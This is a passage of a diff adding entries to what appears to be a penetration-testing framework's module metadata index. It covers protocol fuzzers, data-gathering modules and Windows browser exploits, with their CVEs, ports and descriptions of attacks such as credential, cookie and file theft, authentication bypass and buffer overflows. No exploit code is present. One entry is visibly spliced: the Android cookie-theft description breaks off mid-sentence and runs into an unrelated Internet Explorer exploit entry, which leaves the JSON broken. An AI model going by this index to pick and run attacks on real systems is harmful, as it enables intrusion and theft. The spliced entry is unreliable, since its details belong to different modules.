+ "author": [ + "corelanc0d3r ", + "jduck " + ], + "description": "This module will connect to a FTP server and perform pre- and post-authentication fuzzing", + "references": [], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2019-03-05 03:38:51 +0000", + "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb", + "is_install_path": true, + "ref_name": "fuzzers/ftp/ftp_pre_post", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/http/http_form_field": { + "name": "HTTP Form Field Fuzzer", + "fullname": "auxiliary/fuzzers/http/http_form_field", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "corelanc0d3r", + "Paulino Calderon " + ], + "description": "This module will grab all fields from a form,\n and launch a series of POST actions, fuzzing the contents\n of the form fields. You can optionally fuzz headers too\n (option is enabled by default)", + "references": [ + "URL-http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/fuzzers/http/http_form_field.rb", + "is_install_path": true, + "ref_name": "fuzzers/http/http_form_field", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/http/http_get_uri_long": { + "name": "HTTP GET Request URI Fuzzer (Incrementing Lengths)", + "fullname": "auxiliary/fuzzers/http/http_get_uri_long", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullthreat" + ], + "description": "This module sends a series of HTTP GET request with incrementing URL lengths.", + "references": [], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/http/http_get_uri_long.rb", + "is_install_path": true, + "ref_name": "fuzzers/http/http_get_uri_long", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/http/http_get_uri_strings": { + "name": "HTTP GET Request URI Fuzzer (Fuzzer Strings)", + "fullname": "auxiliary/fuzzers/http/http_get_uri_strings", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullthreat" + ], + "description": "This module sends a series of HTTP GET request with malicious URIs.", + "references": [], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb", + "is_install_path": true, + "ref_name": "fuzzers/http/http_get_uri_strings", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ntp/ntp_protocol_fuzzer": { + "name": "NTP Protocol Fuzzer", + "fullname": "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jon Hart " + ], + "description": "A simplistic fuzzer for the Network Time Protocol that sends the\n following probes to understand NTP and look for anomalous NTP behavior:\n\n * All possible combinations of NTP versions and modes, even if not\n allowed or specified in the RFCs\n * Short versions of the above\n * Short, invalid datagrams\n * Full-size, random datagrams\n * All possible NTP control messages\n * All possible NTP private messages\n\n This findings of this fuzzer are not necessarily indicative of bugs,\n let alone vulnerabilities, rather they point out interesting things\n that might deserve more attention. Furthermore, this module is not\n particularly intelligent and there are many more areas of NTP that\n could be explored, including:\n\n * Warn if the response is 100% identical to the request\n * Warn if the \"mode\" (if applicable) doesn't align with what we expect,\n * Filter out the 12-byte mode 6 unsupported opcode errors.\n * Fuzz the control message payload offset/size/etc. There be bugs", + "references": [], + "platform": "", + "arch": "", + "rport": 123, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-04-06 14:45:11 +0000", + "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb", + "is_install_path": true, + "ref_name": "fuzzers/ntp/ntp_protocol_fuzzer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb2_negotiate_corrupt": { + "name": "SMB Negotiate SMB2 Dialect Corruption", + "fullname": "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB negotiate requests that advertise a\n SMB2 dialect with corrupted bytes.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-08-24 21:38:44 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb2_negotiate_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_create_pipe": { + "name": "SMB Create Pipe Request Fuzzer", + "fullname": "auxiliary/fuzzers/smb/smb_create_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB create pipe\n requests using malicious strings.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_create_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_create_pipe_corrupt": { + "name": "SMB Create Pipe Request Corruption", + "fullname": "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB create pipe requests with corrupted bytes.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_create_pipe_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_negotiate_corrupt": { + "name": "SMB Negotiate Dialect Corruption", + "fullname": "auxiliary/fuzzers/smb/smb_negotiate_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB negotiate requests with corrupted bytes", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-08-24 21:38:44 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_negotiate_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_ntlm1_login_corrupt": { + "name": "SMB NTLMv1 Login Request Corruption", + "fullname": "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB login requests using\n the NTLMv1 protocol with corrupted bytes.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-07 20:22:56 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_ntlm1_login_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_tree_connect": { + "name": "SMB Tree Connect Request Fuzzer", + "fullname": "auxiliary/fuzzers/smb/smb_tree_connect", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB tree connect\n requests using malicious strings.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_tree_connect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smb/smb_tree_connect_corrupt": { + "name": "SMB Tree Connect Request Corruption", + "fullname": "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SMB tree connect requests with corrupted bytes.", + "references": [], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": null, + "mod_time": "2020-05-13 16:34:47 +0000", + "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/smb/smb_tree_connect_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/smtp/smtp_fuzzer": { + "name": "SMTP Simple Fuzzer", + "fullname": "auxiliary/fuzzers/smtp/smtp_fuzzer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "justme" + ], + "description": "SMTP Simple Fuzzer", + "references": [ + "URL-http://www.ietf.org/rfc/rfc2821.txt" + ], + "platform": "", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb", + "is_install_path": true, + "ref_name": "fuzzers/smtp/smtp_fuzzer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ssh/ssh_kexinit_corrupt": { + "name": "SSH Key Exchange Init Corruption", + "fullname": "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SSH requests with a corrupted initial key exchange payload.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/ssh/ssh_kexinit_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ssh/ssh_version_15": { + "name": "SSH 1.5 Version Fuzzer", + "fullname": "auxiliary/fuzzers/ssh/ssh_version_15", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SSH requests with malicious version strings.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb", + "is_install_path": true, + "ref_name": "fuzzers/ssh/ssh_version_15", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ssh/ssh_version_2": { + "name": "SSH 2.0 Version Fuzzer", + "fullname": "auxiliary/fuzzers/ssh/ssh_version_2", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SSH requests with malicious version strings.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb", + "is_install_path": true, + "ref_name": "fuzzers/ssh/ssh_version_2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/ssh/ssh_version_corrupt": { + "name": "SSH Version Corruption", + "fullname": "auxiliary/fuzzers/ssh/ssh_version_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of SSH requests with a corrupted version string", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/ssh/ssh_version_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/tds/tds_login_corrupt": { + "name": "TDS Protocol Login Request Corruption Fuzzer", + "fullname": "auxiliary/fuzzers/tds/tds_login_corrupt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of malformed TDS login requests.", + "references": [], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb", + "is_install_path": true, + "ref_name": "fuzzers/tds/tds_login_corrupt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_fuzzers/tds/tds_login_username": { + "name": "TDS Protocol Login Request Username Fuzzer", + "fullname": "auxiliary/fuzzers/tds/tds_login_username", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "hdm " + ], + "description": "This module sends a series of malformed TDS login requests.", + "references": [], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/auxiliary/fuzzers/tds/tds_login_username.rb", + "is_install_path": true, + "ref_name": "fuzzers/tds/tds_login_username", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/acronis_cyber_protect_machine_info_disclosure": { + "name": "Acronis Cyber Protect/Backup machine info disclosure", + "fullname": "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die-gr3y ", + "Sandro Tolksdorf of usd AG." + ], + "description": "Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,\n compute, storage and application resources. Businesses and Service Providers are using it\n to protect and backup all IT assets in their IT environment.\n This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect\n appliance which, in its default configuration, allows the anonymous registration of new\n backup/protection agents on new endpoints. This API endpoint also generates bearer tokens\n which the agent then uses to authenticate to the appliance.\n As the management web console is running on the same port as the API for the agents, this\n bearer token is also valid for any actions on the web console. This allows an attacker\n with network access to the appliance to start the registration of a new agent, retrieve\n a bearer token that provides admin access to the available functions in the web console.\n\n This module will gather all machine info (endpoints) configured and managed by the appliance.\n This information can be used in a subsequent attack that exploits this vulnerability to\n execute arbitrary commands on both the managed endpoint and the appliance.\n This exploit is covered in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.\n\n Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and\n Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.", + "references": [ + "CVE-2022-30995", + "CVE-2022-3405", + "URL-https://herolab.usd.de/security-advisories/usd-2022-0008/", + "URL-https://attackerkb.com/topics/27RudJXbN4/cve-2022-30995" + ], + "platform": "", + "arch": "", + "rport": 9877, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-11-26 16:10:14 +0000", + "path": "/modules/auxiliary/gather/acronis_cyber_protect_machine_info_disclosure.rb", + "is_install_path": true, + "ref_name": "gather/acronis_cyber_protect_machine_info_disclosure", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/adobe_coldfusion_fileread_cve_2023_26360": { + "name": "Adobe ColdFusion Unauthenticated Arbitrary File Read", + "fullname": "auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "sf " + ], + "description": "This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe\n ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to read\n an arbitrary file from the server.\n\n To run this module you must provide a valid ColdFusion Component (CFC) endpoint via the CFC_ENDPOINT option,\n and a valid remote method name from that endpoint via the CFC_METHOD option. By default an endpoint in the\n ColdFusion Administrator (CFIDE) is provided. If the CFIDE is not accessible you will need to choose a\n different CFC endpoint, method and parameters.", + "references": [ + "CVE-2023-26360", + "URL-https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis" + ], + "platform": "", + "arch": "", + "rport": 8500, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360.rb", + "is_install_path": true, + "ref_name": "gather/adobe_coldfusion_fileread_cve_2023_26360", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/advantech_webaccess_creds": { + "name": "Advantech WebAccess 8.1 Post Authentication Credential Collector", + "fullname": "auxiliary/gather/advantech_webaccess_creds", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-01-21", + "type": "auxiliary", + "author": [ + "h00die", + "sinn3r " + ], + "description": "This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.\n Although authentication is required, any level of user permission can exploit this vulnerability.\n\n Note that 8.2 is not suitable for this.", + "references": [ + "CVE-2016-5810", + "URL-https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/gather/advantech_webaccess_creds.rb", + "is_install_path": true, + "ref_name": "gather/advantech_webaccess_creds", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/alienvault_iso27001_sqli": { + "name": "AlienVault Authenticated SQL Injection Arbitrary File Read", + "fullname": "auxiliary/gather/alienvault_iso27001_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-30", + "type": "auxiliary", + "author": [ + "Brandon Perry " + ], + "description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n generation PHP file. This module exploits this to read an arbitrary file from\n the file system. Any authenticated user is able to exploit it, as administrator\n privileges aren't required.", + "references": [ + "EDB-32644" + ], + "platform": "Linux", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb", + "is_install_path": true, + "ref_name": "gather/alienvault_iso27001_sqli", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/alienvault_newpolicyform_sqli": { + "name": "AlienVault Authenticated SQL Injection Arbitrary File Read", + "fullname": "auxiliary/gather/alienvault_newpolicyform_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-05-09", + "type": "auxiliary", + "author": [ + "Chris Hebert " + ], + "description": "AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against\n newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability\n to read an arbitrary file from the file system. Any authenticated user is able to exploit\n this, as administrator privileges are not required.", + "references": [ + "CVE-2014-5383", + "OSVDB-106815", + "EDB-33317", + "URL-http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb", + "is_install_path": true, + "ref_name": "gather/alienvault_newpolicyform_sqli", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_gather/android_browser_file_theft": { + "name": "Android Browser File Theft", + "fullname": "auxiliary/gather/android_browser_file_theft", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Rafay Baloch", + "joev " + ], + "description": "This module steals the cookie, password, and autofill databases from the\n Browser application on AOSP 4.3 and below.", + "references": [ + "URL-https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0", + "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=90222" + ], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/gather/android_browser_file_theft.rb", + "is_install_path": true, + "ref_name": "gather/android_browser_file_theft", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "WebServer", + "description": "Serve exploit via web server" + } + ] + }, + "auxiliary_gather/android_browser_new_tab_cookie_theft": { + "name": "Android Browser \"Open in New Tab\" Cookie Theft", + "fullname": "auxiliary/gather/android_browser_new_tab_cookie_theft", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Rafay Baloch", + "joev " + ], + "description": "In Android's stock AOSP Browser application and WebView component, the\n \"open in new tab\" functionality allows a file URL to be opened. On\n versions of Android before 4.4, the path to the sqlite cookie\n database could be specified. By saving a cookie containing a .\n\n IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from\n an x64 iexplore.exe.\n\n By default, this module will not attempt to fire against IEs that come with Protected\n Mode enabled by default, because it can trigger a security prompt. However, if you are\n feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT\n datastore option to true.", + "references": [ + "URL-http://support.microsoft.com/kb/182569", + "URL-http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html", + "URL-http://support.microsoft.com/kb/870669" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86/x64" + ], + "mod_time": "2021-01-13 11:06:01 +0000", + "path": "/modules/exploits/windows/browser/ie_unsafe_scripting.rb", + "is_install_path": true, + "ref_name": "windows/browser/ie_unsafe_scripting", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/imgeviewer_tifmergemultifiles": { + "name": "Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control", + "fullname": "exploit/windows/browser/imgeviewer_tifmergemultifiles", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-03-03", + "type": "exploit", + "author": [ + "Dr_IDE", + "TecR0c ", + "mr_me " + ], + "description": "This module exploits a stack based buffer overflow in the Active control file\n ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()\n method. Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.", + "references": [ + "CVE-2010-5193", + "OSVDB-78102", + "EDB-15668", + "URL-http://web.archive.org/web/20101204093821/http://secunia.com:80/advisories/42445", + "URL-http://xforce.iss.net/xforce/xfdb/63666" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Internet Explorer 6/7", + "Internet Explorer 8 with JRE" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb", + "is_install_path": true, + "ref_name": "windows/browser/imgeviewer_tifmergemultifiles", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/indusoft_issymbol_internationalseparator": { + "name": "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow", + "fullname": "exploit/windows/browser/indusoft_issymbol_internationalseparator", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-28", + "type": "exploit", + "author": [ + "Alexander Gavrun", + "Dmitriy Pletnev", + "James Fitts ", + "juan vazquez " + ], + "description": "This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00\n SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long\n string argument for the InternationalSeparator() method of the ISSymbol control.\n This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.", + "references": [ + "CVE-2011-0340", + "OSVDB-72865", + "BID-47596", + "ZDI-12-168", + "URL-http://web.archive.org/web/20110506063846/http://secunia.com:80/secunia_research/2011-37" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb", + "is_install_path": true, + "ref_name": "windows/browser/indusoft_issymbol_internationalseparator", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/inotes_dwa85w_bof": { + "name": "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/inotes_dwa85w_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-01", + "type": "exploit", + "author": [ + "Gaurav Baruah", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. The affected ActiveX is\n provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3.\n\n In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one\n is installed with the iNotes ActiveX.", + "references": [ + "CVE-2012-2175", + "OSVDB-82755", + "BID-53879", + 